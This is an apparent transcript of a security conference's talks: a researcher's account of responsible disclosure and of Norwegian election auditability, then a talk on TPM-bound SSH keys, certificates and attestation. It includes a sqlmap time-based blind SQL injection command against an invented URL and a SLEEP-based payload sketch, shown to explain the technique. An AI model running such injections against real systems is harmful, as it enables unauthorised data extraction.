
which means that this is actually active — it's reading this, and yeah. So it's quite a hard parameter to use; it was the sort parameter. So I tried out sqlmap, a tool for doing SQL injection. I ran that and got some basic system information and the names of the tables from one public entity here, and it ran for about eight hours to get that, because this was a time-based blind SQL injection. It's the timing of how fast it responds that determines if
the letter you are looking for is the right one. So you have to go letter by letter, which is quite time-intensive for extracting data, but it is possible. For the alerts here, I sent them to the creator of the system and also to the one I ran the tool against, and their service provider — there's a company running the service for that municipality. I then later alerted all the rest of the customers as well, because I of course have lists of them, since I scrape all the instances of this system.
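For context, a time-based blind injection run with sqlmap looks something like this (the URL and parameter are invented, and the payload sketch assumes a MySQL backend):

```
sqlmap -u "https://example-municipality.no/list?sort=name" \
       -p sort --technique=T --time-sec=5 --tables
# Under the hood it asks yes/no questions one character at a time, e.g.:
#   ... AND IF(SUBSTRING(current_user(),1,1)='a', SLEEP(5), 0)
# and reads the answer from whether the response was delayed.
```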
So do organizations push back and put legal on the case?
I have not experienced that myself. The first day with Remathusen, they were pointing the finger at me. That made the media case more spicy, so they had more to do on the media team that day. But they didn't do anything more than that. Here it is very important to remember the boundaries: if you behave, they will behave.
If you do too much, there will likely be repercussions for whatever action you took. So don't do too much — do enough to prove the issue. But don't make a copy of the database, because that is never necessary. I often think that if I have enough to make a few slides for a presentation, that is usually enough for me to prove the issue. And it's usually the same data that I will provide in the alert email that I send them, so they will have some of it there as well.
So let's turn over to elections, keeping our security mindset with us. The last couple of years, I've spent a lot of time checking the Norwegian election. As I said, I collect data, I try to find systemic issues and make the right people aware. So this is not necessarily like the other cases — it's not application security in that sense; it's more the election as a whole, the system level rather than specific issues. So, a little election 101. There are two essential factors we need to speak about: trust and anonymity. Everybody should trust the results of the election. They must understand how the election works. They must know about the checks that are in place in the election to get the
right result. It should be transparent, so that everybody can audit the election.
The outcome of the election must be hard to change, meaning that we must require many steps, and many people conspiring, to make a change in the election. If one single person or one single point in the election can change it without many people being involved, that is an issue.
For a free election, we also need anonymity. Under no circumstance should anyone be able to identify what somebody voted for. That way you avoid pressure on people.
So in society, we should not have posters saying 50% off for yellow voters, or only red voters allowed, or green voters pay double — or even worse, violence, which can happen. So it's very important that you can't know what somebody voted for.
In Norway, we have three main elections, held every second year: the county and municipal election together, and then the parliamentary election by itself. Next up is the parliamentary election, which is next year; the county and municipal election was last year.
There are two main types of voting in Norway: early voting and election day voting. All voting is done on physical paper ballots — no electronic voting in the polling stations. So there's no computer where you click a button for the party you want to vote for. At the polling station, you will be ID-checked before you deliver your vote. In early voting, you can vote anywhere in the country. If you vote somewhere other than where you live, that vote goes into an envelope, as you see in the picture here, and is mailed back to where you live. So your vote will always get back to your local municipality.
On election day, it's only possible to vote where you live, because your vote will be counted in that place.
So the votes are in — let's count them. The first preliminary count is manual, meaning that humans do the counting; we'll have a look at that on the next slide. And here I just want to give a big thanks to Patricia, who was mentioned before the talk. She was on the barricades in 2017 and is one of the reasons why mandatory manual counting is present in the law today. She put a spotlight on issues with unreliable electronic counting, which was well on its way into the Norwegian election. Most municipalities do the first count at the polling station with the employees that are present at that time. I've been on that last
shift at my polling station and have attended the counting. This is the first count, and that is what they report to the public and to the media for the live reporting on election day. The second and final count can be either manual or electronic, but most municipalities do this electronically today. All the large places have scanners and have had them for a long time. After they're done, they send the election material further to the county for another count with other equipment — that one is also electronic. So, manual counting, just to get a feel for how this actually works: in the first picture here, you have people sorting the ballots into the two different elections.
The ballots are then also sorted by party and by whether they are stamped. If a ballot is not stamped, it is put aside, because that is not a valid vote. On the right here, you see after the counting is done: the ballots are sorted and counted, with a Post-it note saying how many votes are in each stack. And that is recounted by another person, so two people count each stack. This type of manual counting will have some errors. The discrepancies should be checked and noted, and spot checks should be done.
The counts go into the electoral record, in Norwegian the valgprotokoll. This is the official document from that municipality, so that is their end result. It is printed and signed by the local election board, exemplified here by Oslo in the picture. There are about 357 of these per election, which makes it above 700 for the two elections last year.
All right, so let's look further into the security, and my investigations from the last election. To sum up where we use digital systems in the Norwegian election today: we have two main systems, EVA Admin and EVA Scanning. Both are owned and maintained by the Directorate of Elections, so they are centrally managed. The admin application is a web portal, and the scanning application is a desktop application. First, we have the voter registry, where everybody who can vote is present, with data imported from the central population register in Norway. This is used to do the ID check when you cast your vote at the polling station. Then we have the electronic counting, done in the scanning solution — a desktop application with connected
scanners. After that, the result is imported into the admin application again, where the electoral record, the PDF, is produced. The results are then published, after approval in the application, to the result page and the media. So, some questions. Are these election systems secure? Can election results be changed without anybody knowing? Are some voters excluded, maybe for technical reasons that you didn't think of, intentional or not? Where can we add votes in this election? And what can we check?
So I've tried to answer some of these questions, or get answers to them. How can we audit these systems? Do we have the source code? That would be a good start. No — we only have parts of it. We are missing the essential parts, so you can't run the code, which makes it sort of security by obscurity, while they can still say "we have released the source code". The published source code is no longer being updated; the last update was in 2019. So my trust in the election goes down without that kind of source code access.
The argument against releasing it is national security, and that criminal activity could happen.
But I would argue that this piece of code is the execution of the law. If you don't have the procedure — the code that is executing the law — you are missing a big piece of how it's done. So we should have access to it, I think. If this procedure, whatever the application does, were done by a human, you would have that procedure written down. And we do have that procedure for a lot of the things that happen in the election, but not when it's a digital system, because then it's scary. I spent a lot of time trying to get hold of the source code through freedom of information requests, but I have stopped pursuing that. Because even if we have the running
code, can we trust the system? Is it the same version that is running? We don't know. And given that we are anonymous in the actual election, can we make it verifiable? We could invent some hashing scheme for the votes so you could check that your vote was counted — but that's just an engineer's wet dream. We can't really do that without losing the anonymity. So in the digital system, we only need one place to exploit to change the result and lose that check.
The image you have been looking at is the election system, EVA Admin. That is me, logged in to the production environment. This is not a bug; this is me as an election official doing my job. So it's not a security issue — unless you consider me a security issue.
So, all systems are buggy. I know systems are buggy: I code things, I work with systems, I make them, I know that things go wrong. And this also includes election systems. Last election there were at least two instances of issues related to code or code changes. I've read the incident report. It started with a critical issue in the Oslo election. They made an emergency release for that bug, and that resulted in another critical issue — which often happens. The second one was found by me in the electoral records, which you see behind here.
I expect this to happen in a system; it's not unusual that bugs occur and things happen. But these were bugs without any intention of changing the result, and even they changed the result. That just shows that systems are buggy. So can we audit the election without the digital systems, without these pieces of procedure that we can't
look into? A couple of slides back, we had this on the wall. I'm changing out the first item to be the paper ballots and the manual counting. And this is why the manual counting is so important: then we can check against the result. We have a manual count that has not gone through any system, and we can check that against the results, hopefully. This is all made possible by the changes in 2018, when it became mandatory to do this manual count, after pressure from security professionals like yourselves. But first, let's look into the data collection from last year.
You know the saying "this meeting could have been an email" — well, all these emails could have been an API. Due to lack of transparency on important data from the Directorate of Elections, I need to collect all these records directly from the municipalities by asking each one of them. So the data was collected by sending about 1,300 emails. A lot of this is the first request, and then a lot of reminders — nagging, to a certain degree. Most of them are quite similar emails, so it's not like I'm typing out all of these. But still. The replies
might be questions, might be the correct PDF that I'm looking for, or might be something else. The results are very
different in form and shape. So last year I used some AI to read a lot of these emails and summarize them, and also to extract data points from them. In a way, I just built the missing API and integrated with the municipalities over a very ineffective channel of communication, which is email. It's quite slow. As you can see, not all municipalities managed to respond in time. I've sent some complaints, but I haven't tried to get it up to 100% — it's at about 80% to 90% — because I really want to look into the data; I don't want to spend more time on the data collection. So, over to the data. Here is Ferdag Kommune as an example of some of the data, from the municipal election. They found 95
extra votes in the final count. This, according to my code, changed the seats between two parties. I have simulated the preliminary seat allocation and got the final seats from the actual PDF. And the comment was: "discrepancy checked by scanning twice". So they ran the scanning twice — same equipment, all the same stuff, same result. We trust the system. This is a typical example of the trust in computers among election officials. A lot of them don't look at it with the same security mindset that we would.
But I wouldn't trust my own code this much, that's for sure.
From the last election's electoral records, here are some of the interesting numbers I've extracted. As in the previous slide, there were 22 municipalities with a change of seats between the first preliminary count and the final count. Some of these might be explainable — there might be votes that my code doesn't pick up. But some of them are also like the larger one we just saw. Usually this is picked up by others as well, so it's not like it goes completely unnoticed. But still, there are discrepancies. I also have another check for whether the difference in vote count is more than 1% for one party — so one party
losing 100 votes and another one gaining them, which is not what you would typically expect. Of those 1% differences, we have 34, and that is a lot. We also have a lot of ballot stuffing, meaning that there are more votes in the ballot box than voters. Because when your ID is checked, you are crossed off — marked as having voted. And that count of how many were crossed off shouldn't be less than the number of votes. So if there are more votes than people who should have voted, that is of course an issue. Some of these are quite minor, but they might point to something that should be looked into, or show that the whole election process should have better data on this. 17 of
them were due to the emergency release of the election system while the counting was going on. So due to a release while they were counting,
we got some bugs there. This is the one we previously looked into.
I did a separate study of Rogaland, where I'm from, to try to answer exactly the question I just asked: can we audit the digital systems? Do we have a record of something that is not extracted from that system? You're not meant to read all of this — just notice that there are many red boxes. So let's go to the summary. I found that five of the 23 municipalities in Rogaland can be audited outside the main election system, outside that admin system. And when I say I can audit them, I mean that I got a copy of some handwritten notes from the actual manual counting that they did. A lot of them said they had just thrown
out those notes. Some said they had shredded them because it's, I don't know, secret or something. So these are the kinds of comments they responded with. I think we can get this number a lot higher by asking all the municipalities ahead of time: you should keep these, because they are important. But they don't see it as important right now. So it's just by accident that some kept them and others didn't. But this is the number we want to get higher, to be able to audit end to end. Still, it's really hard to scale an attack against an election that is on paper ballots and has so many places of counting.
Unless you hit the digital systems, of course, where one vulnerability can change the whole election outcome. But there's also a new spanner thrown into the works. The Norwegian government is investigating and collecting information on electronic counting at the polling station — meaning not a laptop, but some kind of machine where you hit a button for your vote — and is also looking into online voting, which is another very bad idea. In light of what I have presented so far, I hope you see some arguments against it. If you need it in shorter form with a good explanation, I recommend this video. It is really good and
goes into all the different arguments around this.
And just a couple of words on online voting. Same arguments as on the previous slide, but with a lot more attack surface. Should you really be allowed to send HTTP requests to an election system? Today, we are not allowed — we are blocked from doing that, and that's a good thing. But there are also other aspects, like social engineering: who is actually doing the voting? There's the undue pressure from people who are present while the voter casts the vote. And if you say yes to online voting, why not do it by phone? Call in your vote — would you trust the guy on the other end to write down the right vote
and follow the procedure? All right, let's recap. We started out by looking at responsible disclosure: alerting owners, giving fair time to respond, and behaving if you wander into something. Next, we looked at elections with a security mindset. Can voters understand the election? Can you understand the election? Can you audit the election? To some degree we can, but there is room for improvement. My biggest scares are, in this order: online voting, electronic voting at polling stations, and no human count of ballots. I wouldn't trust an election with any of these.
So I'm ending on a call to action: you should observe your local election. I can only be in one place at a time. Go to your polling station, watch the count — you are completely allowed to do that, and it's also stated in the new election law. I was actually rejected at one polling station last election, but another one let me watch. You're allowed to take pictures and videos; you're allowed to see how the counting is done. You should look at how the ballots are stored after the preliminary count, and how they are transported. I've seen a couple of things where the procedure says one thing, but it's not always followed if people aren't looking. So let's have a look at the election. Thank you.
Thank you very much, Hallvard. That was very, very interesting. We have a few minutes for questions. Does anyone have a question for Hallvard? No? Then I'll ask a question to get things started. You said that you were undercover. Yes. I'm wondering, what about the situation makes you feel like you have to be undercover when you're... Yeah, it's not going secretly undercover and hiding my identity. It's just that your local municipality will be asking for people to man the polling station, and everybody can basically sign up for stuff like that. You will then be an employee of the municipality for that day. So it's not a very undercover, secret thing. Oh, we have a question
at the back. Coming back to you.
So my question is: since you're that critical of the electronic systems for voting, are you distrustful of electronic systems per se? Are there any systems that you feel are a success when it comes to verifying identities, or behaving in the electronic age for citizens? I didn't quite get the last part there, but on the first part: the digital systems are being checked, they are being penetration tested. They are likely good systems, but it's a systemic thing to not trust them completely, because there can be issues and you likely don't know where the issues are. Right, so the last part was: if you don't trust your identity in the election system, do you trust your identity in other systems, like NAV or Skatteetaten? Yeah,
we need digital systems to make this work; otherwise it would be too much. But you should always have rights in every situation, and you do have that with NAV as well. Electronic systems are of course effective for doing things at a larger scale. All right, thank you very much. This is obviously a sensitive topic, and if you would like to discuss it with Hallvard more privately, he will be available for questions and discussion. Thank you very much. And moving right along with our next speaker, I do have... This year, instead of the usual gift bags, we are giving donations on behalf of our speakers to Mental Helse Ungdom, in collaboration with Elvebakken videregående — Elvebakken High
School. And we do have some volunteers here today from Elvebakken High School. Are you in the room? Shout out to... yeah, they're all there at the back. Thank you — for helping with media and making sure that everything goes smoothly. I can also give you a quick update on the shirts. The shirts are lost; nobody knows where they are. But we're going to get new shirts printed by 4 o'clock today and delivered. So let's have a round of applause for Puneeta for that.
And then we'll have a bigger one when they actually get here. A big,
big round of applause. And the last point of logistics: I can now welcome everybody who is watching on the stream. We have the stream up with sound, with a bit of delay at the moment. Welcome, and thank you — and sorry about the delay on the stream. The stream will conclude
before the second break. So if you're on the stream and look at the program on the website: the last three talks will not be recorded or streamed, due to the sensitivity of those topics and personal requests. We're saving some good stuff for those of you who are here in the room with us today.
All right, with that...
The live demo has already crashed and burned.
So at the end of the program we will have the closing remarks, and then the bar opens in Pokalen in an hour while we set up here, and afterwards we come back down for the dinner and social.
Okay. I'd just like to build up the suspense before we talk about SSH, as if it were a topic that's not already exciting enough. Welcome, Morten. Yes, thank you. Give it up for Morten Linderud.
Is it not working?
Why don't you... No, it's still not.
What? Are you still getting a signal? No, because it...
It disconnects... I saw you had something, but I understand it worked for a while. But it keeps changing, right? And
that's where you're supposed to be speaking. Maybe I'll just switch to English.
This is, yeah. Yes.
Yes. Sorry about that — turns out Linux and display stuff is not easy. So, my name is Morten Linderud. I'll be talking to you today about SSH, and sort of strengthening SSH with multiple signals. We'll take a look at how TPMs do platform attestation, how we can use identity providers to give us stronger identity claims on SSH keys, and how we can distribute SSH keys for servers. I go by the nickname Foxboron on the internet. I have been doing open source software development for around 10 years now. I've been an Arch Linux developer since 2016, where I've been doing packaging, being part of the security team, reproducible builds, and maintaining different projects. I care a lot about usable security tooling, so I've been doing
projects around Secure Boot, UEFI, and lately a bunch of TPM projects. I'm also a board member of Hackeriet, which is heavily present today, helping to run the hardware hacking village. When I'm not doing open source stuff, I work DevOps at an arcade, working on things like the elections and sort of the visual storytelling stuff.
But first, let's go back to the basics. So we should make an SSH key.
When we do SSH, we preferably make a key. We'll make an ed25519 key. Do you want a passphrase? Yes — let's use 1234. And now we have made this SSH key, and we want to use it to authenticate. So what we do is copy it to our server, which is very important. You can tell, because it says "important" in the domain.
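Reconstructed, the demo so far is roughly the following (the hostname is illustrative, and the trivial passphrase is part of the joke):

```
ssh-keygen -t ed25519 -f ~/.ssh/id_ed25519   # passphrase: 1234
ssh-copy-id root@important.example.com        # prompts for the root password
ssh root@important.example.com                # now authenticates with the key
```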
Then we type in the root password. And next time we try to connect to this SSH service, we type in the passphrase and we get access to our server. The cool thing is that we now have root access with an SSH key instead of the password. And the reason a user can't see the key is the permissions on the key file — or, well, I accidentally leaked the entire key. So if you now have access to the server, my key is exposed. This is what we usually call key compromise, or key extraction. You can now copy the key and get access to the service, and nothing ties it
to the SSH service itself. We would prefer better ways of preventing this. And it's not limited to SSH keys: the same goes for things like cookies, access tokens, and other credentials that are not directly connected to your hardware or identity, and can be abused without you having access to the key. They can be used for privilege escalation, impersonation, or things like compromising GitHub repositories if you just have access to the key. An extracted SSH key is also trivially brute-forceable if the passphrase is weak. That's the sort of thing you want to prevent. And this isn't just theoretical. There's a fairly recent case where an APT, I think, got access to a vulnerable
Jenkins server. They extracted an SSH key from Jenkins and then used it to compromise the GitHub repositories of the organization — which we should try to prevent. The key should be more strongly tied to something that stops you from carrying it away. You also have GitHub, which leaked their RSA host key by accident, which would allow some form of SSH man-in-the-middle attack, intercepting connections.
So what we would prefer is some way to have device-bound keys. This would prevent people from taking our keys and reusing them without having access to our machines. We'd like to strongly tie this to some identity claim, like your Microsoft identity at work, your Okta account, or some other provider. We would also like to make sure that the SSH keys are strongly tied to the machine you're using them on; that ensures you also have access to the correct device. And in an enterprise setting, you would want it to be a device that is enrolled in MDM, or some device that your company has control over. All of these things together would
actually allow us to have more trust in SSH keys, or other credentials that we would like to secure. One of the cool things that is ubiquitous these days is the Trusted Platform Module, or TPM. You can use YubiKeys to do this even better, but TPMs are standard hardware on most machines today. They are secure crypto processors. They do things like checking the boot and doing platform attestation, which we'll take a little look at. They're usually implemented as some form of separate hardware — a module connected to your motherboard — but they can also be implemented as part of your CPU firmware; I think
Intel used to do this in SGX, but it's now in some other thing, and AMD has its secure processor. A TPM supports platform integrity, which gives you some assurance about how you booted and which state your computer is in. It has a way to do keys and hierarchies, which we'll take a look at. And then attestation, which is strongly tied to the machine identity part that we'll look at afterwards. The way the platform integrity works is that we have these platform configuration registers, or PCRs. There are 24 of them.
Each is some part of the boot chain which is hashed and stored in the TPM. PCRs 0 to 7 are usually the platform registers, the firmware part of the boot chain, and the rest are for the OS and runtime part of it. For the Linux side of this, the UAPI group specification details which register is used for what. And you can use this to create policies, or to lock keys to a given TPM state.
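For example, you can inspect the firmware-controlled registers with tpm2-tools:

```
# Read the SHA-256 bank of the platform PCRs (0-7):
tpm2_pcrread sha256:0,1,2,3,4,5,6,7
```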
We also have the concept of hierarchies and seeds. TPMs are not great computers. What they have is hardcoded seeds that you can derive keys from through a key derivation function. There are three seeds by default. The endorsement seed is burned into the TPM and is there for the lifetime of the device. The owner seed is for the lifetime of the owner and can be rotated. And then we have the null seed, which is basically for the lifetime of the booted machine — it gets reseeded each boot, so we can create temporary credentials under that seed. The endorsement seed is chained back to the manufacturer, which means you can
get a certificate and verify that it's an authentic TPM, because it was signed by the manufacturer. You can also shield keys: create a key, carry it out of the TPM, and it remains secure. The way this works — because the TPM has a terrible API — is that you say which hierarchy you want, in this case the endorsement hierarchy, which produces a context. We can make a key out of that, in this case an RSA key. We then have the public part, which holds the public cryptography parameters, like the public exponent, and the private part, which is a blob sealed to the TPM. What that allows us to do is load this
public and private part — which can be carried out of the TPM — back into the TPM again, which gives us a new context. We can use that to sign some message, and then to verify the signature.
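With tpm2-tools, that dance looks roughly like this (a sketch; file names and algorithms are illustrative defaults, not the exact demo):

```
tpm2_createprimary -C e -c primary.ctx                      # endorsement hierarchy -> primary context
tpm2_create -C primary.ctx -G rsa -u key.pub -r key.priv    # public part + TPM-sealed private blob
tpm2_load -C primary.ctx -u key.pub -r key.priv -c key.ctx  # load both parts back in -> new context
echo -n "hello" > msg.txt
tpm2_sign -c key.ctx -g sha256 -o msg.sig msg.txt           # sign with the loaded key
tpm2_verifysignature -c key.ctx -g sha256 -m msg.txt -s msg.sig
```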
TPMs also support policies. That means you can tell the TPM in what system state a key may be used, or which user or admin can do certain operations with it — so keys are only usable if your system is in a given state. They also support signed policies, so you can rotate them and so on, but that's a bit beside what we're doing today. The main problems with TPMs these days: they are slow. They are not HSMs, hardware security modules. Most discrete TPMs do seven or eight signatures a second, which is usable, but not for anything that requires a lot of activity. They
also have limited cryptography: most of them these days only have RSA 2048 and the NIST P-256 and P-384 curves, and they only really support the SHA-256 and SHA-384 hashing algorithms. So these things are not going to hold up against quantum attacks, and I think they're starting to be on the low end of key sizes with the new bit-size demands that NIST is looking at. We also need more user-friendly tooling — the commands I just showed you are terrible; I don't remember them offhand, and neither should you. And the other issue is that TPMs are not really supported by OpenSSH, because
OpenSSH doesn't like TPMs that much. But there are still other ways of using them with SSH, and that's the SSH agent. The SSH agent is a daemon that holds private keys for SSH. It communicates over a unix socket, and it helps you do things like caching the passphrase or the PIN. You can also use it to offload key operations. The cool thing with SSH is that if you run an agent, add a key to it, and list it, the agent is aware of the key. What we usually do in SSH is refer to a private key, but when we have the
agent, we only need to refer to the public part of the key. That can be done in the SSH configuration or on the SSH command line. And what that allows us to do is effectively implement an agent that does the TPM key operations for us, using only the public part to identify the key. Implementing an SSH agent is fairly trivial, at least in Go: the library implements a full SSH agent client interface along with the server side, and makes it easy to interact with SSH as a whole. So that's what I did. I wrote ssh-tpm-agent, an SSH agent which allows us to use TPM keys.
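A minimal sketch of that idea using golang.org/x/crypto/ssh/agent — here with an in-memory keyring standing in for the TPM-backed implementation, which would implement the same agent.Agent interface and delegate Sign() to the TPM:

```go
package main

import (
	"log"
	"net"
	"os"

	"golang.org/x/crypto/ssh/agent"
)

func main() {
	// In-memory keyring standing in for a TPM-backed implementation;
	// a real TPM agent implements the same agent.Agent interface and
	// delegates signing to the TPM, so private keys never leave it.
	keyring := agent.NewKeyring()

	sock := "/tmp/demo-agent.sock"
	_ = os.Remove(sock)
	l, err := net.Listen("unix", sock)
	if err != nil {
		log.Fatal(err)
	}
	defer l.Close()
	log.Printf("export SSH_AUTH_SOCK=%s", sock)

	for {
		conn, err := l.Accept()
		if err != nil {
			log.Fatal(err)
		}
		// ServeAgent speaks the ssh-agent wire protocol over the connection.
		go agent.ServeAgent(keyring, conn)
	}
}
```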
The agent supports key creation for most of the algorithms a TPM supports. It also supports some of the OpenSSH key formats. And it uses the Google go-tpm libraries to do the TPM interactions themselves. The way this works is that we have our own authentication socket for the SSH agent. We can make a TPM key, using roughly the same interface as the OpenSSH tooling, and add the new TPM key to the agent — and the standard SSH tooling will be aware of the key. We can also make a normal SSH key, as long as it's one of the supported algorithms, and import it into the agent, so we can rewrap
an existing key into the TPM. It also has some other features, like proxy support, which allows you to combine multiple agents into one front end, and host key support, so you can have your SSH host keys in the TPM. But the main question is: is it secure? I've
already leaked my key once, so let's do it again. What I'm going to do now is create a
new key in the TPM. The PIN is 1234. And now we have the key. What I'm going to do now is go to my GitHub and add this key to my account. That's the wrong thing... We're going to call this "BSides Oslo". We look at the public part of the key, take that, and add it to our GitHub.
And to prove it works —
now that we have added the key to the agent, we prove it by authenticating with github.com. That should work.
And we have authenticated to GitHub. If you're interested in the key, there it is.
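The demo boils down to something like this (flags approximated from the ssh-tpm-agent tooling; check its README for exact usage):

```
ssh-tpm-keygen              # creates a TPM-wrapped key, prompts for a PIN (1234 in the demo)
ssh-tpm-agent &             # point SSH_AUTH_SOCK at the agent's socket
ssh-add -L                  # lists only the public part; the private blob never leaves the TPM
ssh -T git@github.com       # authenticate to GitHub with the TPM-held key
```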
So if you try to take a screenshot of this and use it, you won't be able to. And if you want a QR code for it...
I forgot the command line, because I didn't prepare it. But here's another SSH key that I've uploaded to my GitHub as well, with the PIN 1234 — and that's the QR code for it. So you can try to hack me, or my GitHub, if you really feel like it. And this sort of solves the SSH key problem we started with: I've given you my key, and you're probably not going to be able to use it, which is a huge improvement over what we have been doing. The way this works is through a spec called the TPM 2.0 key file spec; that's how we serialize the keys. It's an ASN.1 format for storing TPM keys, and it has several implementations: OpenSSL has a TPM
2 provider, and the Linux kernel supports these keys as well. That gives us a common format for all of these TPM keys, so we can make keys somewhere else, insert them into our agent, and so on. It supports loadable, importable, and sealed keys. And because there was no good framework for this in Go, I wrote one myself, which is located here. It allows us to easily create TPM keys. So if you use Go and you want a TPM key, you can just define a new loadable key: give it a description, say it's an elliptic curve key with 256 bits of security, and write the bytes of
the key out to a file. And if you want to sign things, you can just use the standard crypto.Signer API in Go, and it just works, which is quite nice. You can also construct keys yourself through the go-tpm API: the template is how the TPM knows what object it should create; we create a loaded object, which is how the TPM loads objects; and then we serialize our own key, with a description and the public and private parts, and write it out to a new key file.
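The exact library calls weren't captured in the recording, so here is a sketch of just the crypto.Signer pattern the talk refers to, with a software ECDSA key standing in for the TPM-backed key (which exposes the same interface):

```go
package main

import (
	"crypto"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

func main() {
	// Software P-256 key standing in for the TPM-backed key; a key
	// loaded from a TPM key file satisfies the same crypto.Signer
	// interface, so the signing code below is identical either way.
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	var signer crypto.Signer = priv

	digest := sha256.Sum256([]byte("message to sign"))
	sig, err := signer.Sign(rand.Reader, digest[:], crypto.SHA256)
	if err != nil {
		panic(err)
	}
	fmt.Printf("ASN.1 ECDSA signature: %x\n", sig)
}
```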
This nicely solves the key problem, but we need some way to distribute these keys — remember, we're making a CA. And SSH has certificates, the SSH certificate key types. They allow some central authority to sign SSH certificates that we can use instead. A certificate can be tied to a user, and to capabilities in SSH, like whether you get a real terminal or not. And you can also do a cool thing, which is giving a lifetime to the keys: you can say it's only valid for five days, one week,
or just five minutes, if you really want. What this allows us to do is not only have keys that are non-extractable, but also keys that are short-lived, which lessens the impact of a compromise. So, another Go example: we define a time range from now plus five minutes. We make a new SSH key, and then an SSH certificate. We say it's a user certificate; we give it a key ID, which is "TPM"; we set valid-after and valid-before, the time range it should be valid in; and we give it a set of permissions — the standard ones: agent
forwarding, port forwarding, getting a real terminal, and loading the rc file of the user. This is signed, and the user can use it to authenticate with the server. And the way the SSH server trusts the CA is through the TrustedUserCAKeys sshd directive.
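With standard OpenSSH tooling, that flow looks like this (key IDs, principals, and paths are illustrative):

```
ssh-keygen -t ed25519 -f user_ca                 # the CA keypair
ssh-keygen -s user_ca -I tpm-key -n fox -V +5m \
           -O permit-pty -O permit-agent-forwarding id_ecdsa.pub
# -> id_ecdsa-cert.pub, valid for five minutes, for principal "fox"
# On the server, in sshd_config:
#   TrustedUserCAKeys /etc/ssh/user_ca.pub
```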
So now we have sort of solved the...
yeah. So now we have device-bound keys, and we have some way of distributing them through a certificate authority. Next, we want identity claims. Identity claims are something that we trust. It can be, for instance, your
Microsoft work account: the claims are signed by Microsoft, and you can go and validate that the attributes of your login actually come from Microsoft itself. This is implemented through something called OpenID Connect, which is standardized across multiple vendors and allows us to do these things. The identity provider is called the IdP, and the claims are signed by the provider itself. OpenID Connect is based on JWTs, or JSON Web Tokens. They can be validated remotely, which means we can take a token, pass it around, fetch the public keys from the provider, and check that the token was
signed by them. The way these things work: there's a header that says how the token is signed; the payload, protected by the signature, holds several claims from our identity provider — in this case we have the email, and the fact that the email has been verified; and the whole thing is protected by an RSA signature. As for the identity providers themselves, there are a bunch of them. We have Okta, Keycloak for self-hosting, Microsoft — which a lot of people probably use in their day-to-day work — and Google through their portal. All of these are usable for users: you make people log in, and you get back various claims. Personally, I'm interested in GitHub, but GitHub doesn't actually do OpenID Connect for users, so you can't use them directly.
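As an illustration (all values invented), a decoded ID token from such a flow might look like this — header naming the signing algorithm, payload carrying the claims, and the whole thing covered by the provider's signature:

```
header:    {"alg": "RS256", "typ": "JWT"}
payload:   {
  "iss": "https://login.example.com",
  "email": "user@example.com",
  "email_verified": true,
  "nonce": "…",
  "exp": 1700000000
}
signature: RSA signature over base64url(header) + "." + base64url(payload)
```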
So I had to work around GitHub's lack of user OpenID Connect. To figure out how these providers are configured, there's this endpoint, /.well-known/openid-configuration, which lists the setup for OpenID Connect. This is the one from Microsoft Online, and you can see they support a bunch of different claims — most of them connected to their Azure stuff, I think. But there are a bunch of claims you can authenticate and verify actually work. The one we are interested in, though, is the acr value, because that's the value that tells you whether two-factor authentication was actually used or not.
Just using username and password is not super useful for us — we want some way of actually verifying identities, strong identity claims. The way people usually do this these days is two-factor authentication, and we want to know from the IdP whether the user actually authenticated with a second factor. This is done with the acr claim in the OpenID Connect spec. The issue is that the claim exists, but it's not really standardized: we don't really know what the two-factor values from a given IdP mean — it's all vendor-specific. The only two semi-standardized values are "silver" and "bronze", and I don't really know what those entail. So figuring out if somebody is
actually using two-factor authentication isn't easy. Google refuses to tell you this because they don't want vendor lock-in — they would prefer that you don't know. Microsoft gives you some of these values, but I couldn't figure out what the values meant. So I needed another way of supporting IdPs without having to hard-code a bunch of identity providers and figure out how each one works. Sigstore is a Linux Foundation project, mostly used for keyless signing, which we don't really care about in this context. But what they do have is a public-good federated IdP, hosted by the Linux Foundation. It does the identity provider part for us: you can do Microsoft, Google, or GitHub through a single identity provider. And as long as
we decide that we trust Sigstore, this works for us. It's sort of a quick hack to get this working instead of hard-coding all the different providers.
The next issue, though, is: how do we know that the authentication we receive was actually requested by the CA? The certificate authority wants an identity claim, but we don't want to accept just any claim — we want the login that the CA requested. Because if we have no way of verifying that, somebody could man-in-the-middle some login through an IdP, send it to us, and we would just blindly trust it. So we need some way of tying the login to our request. I spent a day looking at the list of values that the client can control, to see how we could insert
something we can check for. And after staring at it for a bit too long, I realized that the nonce is client-provided. It's supposed to make sure that the authentication response isn't reused — but that also means we can insert whatever value we want. So the CA makes a random string, inserts it into the nonce, and we just check for that instead of doing another dance. The goal, then, is that our CA gives the client some value; that value has to be present in the signed response we get back; and since it's signed, that gives us the claim that
the identity provider has signed an authentication request that originated from us. So we now have device-bound keys, and we have identity claims — or at least some way of ensuring that we have them. The next step is making sure the device is one that we know. You probably want the device to be from your enterprise, from your organization, so you need some way to prove that a machine is ours. So: machine identities.
When people work from home and such, we don't have a lot of control. Some people log in to internal services from their home machine, because it's practical compared to carrying your work machine everywhere. But for something with a lot of access, like SSH, you'd prefer that not to happen: you want it to come from a machine you know is good, one your enterprise controls. The endorsement key in the TPM is the hard-coded one, there for the lifetime of the machine — but it can't sign things. So the TPM people decided we need something more complicated instead, called credential protection, and attestation keys. In theory, this gives some form of anonymization, so you can attest the identity
of a machine without disclosing which machine it is. That's a bit interesting, but we don't care about it here — we're just going to do credential protection against the endorsement key itself. The TPM also has something called Certify, and session keys. Certify allows us to prove, with a signature, that an object was created on the TPM: TPMs have some magic strings they will refuse to sign, which lets us ensure that a key was created on this particular TPM and that the TPM actually signed the statement. We get a bunch of attributes saying the key can't be exported out of the TPM itself, all of this is signed, and
because of the session key, we can chain this back to the endorsement key itself.
The way this challenge works is that credential protection proves possession of some machine-resident key. There's a shared secret, which is encrypted. We can do this remotely: send the encrypted credential to the TPM, and the TPM can unlock it. What that proves is that the key we encrypted the credential to really lives on that TPM. ActivateCredential is the operation we have to run locally against the TPM, and MakeCredential is the encryption operation itself. MakeCredential is not unique to the TPM — we can do it remotely with just the public information from the TPM — and then send the result over. So the way you prove
possession is: on the CA we run MakeCredential, with the endorsement key, an attestation key, and something we want the client to decrypt. We send this blob to the client, or the agent. The client decrypts the blob and sends the secret string back to the CA. That proves possession of the machine we're actually talking to. So now we have device-bound keys, identity claims, and a way to do machine identity.
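With tpm2-tools, the same exchange looks roughly like this (a sketch; in the talk this happens inside the CA and the agent rather than on the command line):

```
# On the CA, using only public material from the client's TPM:
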